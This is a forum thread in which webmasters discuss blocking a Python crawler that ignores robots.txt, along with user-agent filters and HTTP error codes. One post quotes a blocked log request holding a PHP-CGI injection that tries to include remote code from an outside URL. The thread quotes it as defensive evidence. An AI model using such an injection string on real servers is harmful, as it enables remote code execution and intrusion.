Forum Moderators: open

Message Too Old, No Replies

Simple crawler

         

keyplyr

8:37 am on Nov 14, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



UA: Simple crawler (Linux x86_64; pl) (http://crawler.own3d.pl)
Protocol: HTTP/1.1
Robots.txt: No
Host: OVH
37.187.0.0 - 37.187.255.255
37.187.0.0/16
Welcome to my website
I'am a simple crawler written in python
Leave a message if you want ;)
Waiting for a reply

lucy24

7:21 pm on Nov 14, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



:: detour to raw logs because this one looked familiar ::

My, my. A comprehensive UA block on the simple (haha) string "Simple", case sensitive, would certainly do no harm:
"GET / HTTP/1.1" 200 6386 "-" "Simple cURL Request"
"GET /robots.txt HTTP/1.1" 200 949 "-" "LWP::Simple/6.13 libwww-perl/6.13"
"GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://www.example.com/.fp/r.txt HTTP/1.1" 403 2878 "-" "LWP::Simple/5.827 libwww-perl/5.833"

I also learned that some CMS or other must use "simple" in its boilerplate, because I found an awful lot of blocked requests for it. (So does piwik, but that's in the top-level /piwik/ directory.)

:: futher detour to find out what a 501 error is, not that I'm complaining ::

keyplyr

10:27 pm on Nov 14, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



One of my UA filters is a comprehensive block on all known programming languages and other common terms: perl, php, python pear, java, crawl, spider, etc. Then a couple lines allowing beneficial agents to use these.

My goal of late is to find some reason to allow access.

keyplyr

11:36 am on Nov 15, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



RE: 501 error

I've had sites on a half-dozen hosts and have worked on sites at a dozen more and our host is unique in the way it reports server errors (the 500 family.)

Have you noticed that almost never (except when we ourselves crash our htaccess) a 500 error is logged? It's always a 501 or a 503.

It's like they never want to admit that it was a straight server error on their end. They always want to add some other element to it.

Sice this was true even before the migration to SSD servers, it must be policy or at least the policy of the head admin.

lucy24

7:37 pm on Nov 15, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



My goal of late is to find some reason to allow access.

I think the first hole I ever poked was for the w3 link checker. Their UA exasperatingly uses some standard robotic element --libcurl maybe?-- and I got tired of having to comment-out the line every time I used checklink. So now it's !keep_out if the originating IP is from the appropriate /24. (I'm not concerned with malign agents running a comprehensive checklink on my site.)

I looked up the 503 error a while ago because it shows up pretty often on files that belong to my games. Turns out one legitimate reason is "too many concurrent requests"; my host's server must currently be set for 100. (Years ago it seems to have been 30, but they must have figured out this doesn't cut it.) It doesn't affect the human user, because the browser just repeats the request.

I also use 503 when I'm intentionally sending back an "under construction" message, so humans can get the right error page. (This is a bit funny, because I'm pretty sure that in a spontaneous 503, the server wouldn't be able to send back anything, since it's already overloaded.)

The 501 error-- I looked it up the other day-- is something like "I can't even figure out what you're asking for so I don't know if I'd be able to grant it". Who knows? It may even make malign robots go away faster than a routine 403.

For me the 500 error has never been anything but "Look, doofus, you made a mistake in your own htaccess so don't expect me to do anything about it".

My host used to use something 500-class for mod_security but now they use 418. (I checked the docs once. You can tell the mod what error code to return.) I assume this is so people reading logs can tell what triggered the lockout. (Error Log entries for 403 rank as The Single Most Uninformative Thing in Apache.)

keyplyr

10:38 am on Nov 17, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



You can tell the mod what error code to return.
Yes, that's what Apache Docs says - however, the server config can, and usually does with shared hosting accounts, override what we do with htaccess, especially with response codes.

Got a reply from the bot-rummer:

>What are you doing with the data you collect?

I collect only domain names, don’t store any other data.
Crawler just download index page and search for links to other sites.

>Why does your bot not support robots.txt?

Because I visit every page only once, and never get back :)

>Give me a reason to allow your bot :)

Because its tiny and small puppy ;)
Its made only for fun, I just want to know how many pages it can reach
starting from one.
Now its above 3000000 after one week, my server is very sloooow, so i
think its good score ;)

p.s. sorry for my english ;)

lucy24

8:03 pm on Nov 17, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



however, the server config can, and usually does with shared hosting accounts, override what we do with htaccess

In the specific case of mod_security, it can only be used in config. (The original version could also be used in htaccess.)

Because its tiny and small puppy

Gosh, I'd love to know about this idiom in the writer's home language.

keyplyr

8:24 pm on Nov 17, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Because its tiny and small puppy

Gosh, I'd love to know about this idiom in the writer's home language.

[edited by: keyplyr at 10:47 am (utc) on Jul 8, 2016]

lucy24

9:31 pm on Nov 17, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Y'know, in another venue I have a fixed rule: any post that makes me laugh out loud gets an automatic upvote. I think, however, that the present forum operates by different criteria.